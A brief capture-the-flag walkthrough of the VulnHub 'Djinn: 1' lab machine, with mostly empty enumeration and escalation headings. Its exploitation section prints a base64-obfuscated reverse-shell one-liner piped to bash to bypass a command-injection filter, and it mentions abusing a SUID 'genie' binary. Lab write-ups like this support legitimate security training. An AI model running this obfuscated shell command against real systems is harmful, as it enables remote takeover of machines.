DJINN: 1 — Walkthrough

Jul 13, 2021

--

Level: Beginner-Intermediate
flags: user.txt and root.txt
Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
Format: Virtual Machine (Virtualbox — OVA)
Operating System: Linux

djinn: 1

This website uses 'cookies' to give you the best, most relevant experience. Using this website means you're happy with…

www.vulnhub.com

Enumeration

More Enumeration,

Exploitation

Let’s execute the command to bypass the injection,

echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTkyLjE2OC4xMDMuMTM0LzQyNDIgMDwmMSAyPiYx | base64 -d | bash

Privilege Escalation

now, we are nitish

we have a suid file named genie

looked through the strings output of genie
we can see that we have another parameter -cmd

same goes for /lago

Oscp Preparation

Oscp Certification

@fuffsec

Written by @fuffsec

Security Researcher | (OSWE, OSCP, OSWA, OSWP, CRTP, eWPTX, SSCP)

Help
Status
About
Careers
Blog
Privacy
Terms
Text to speech
Teams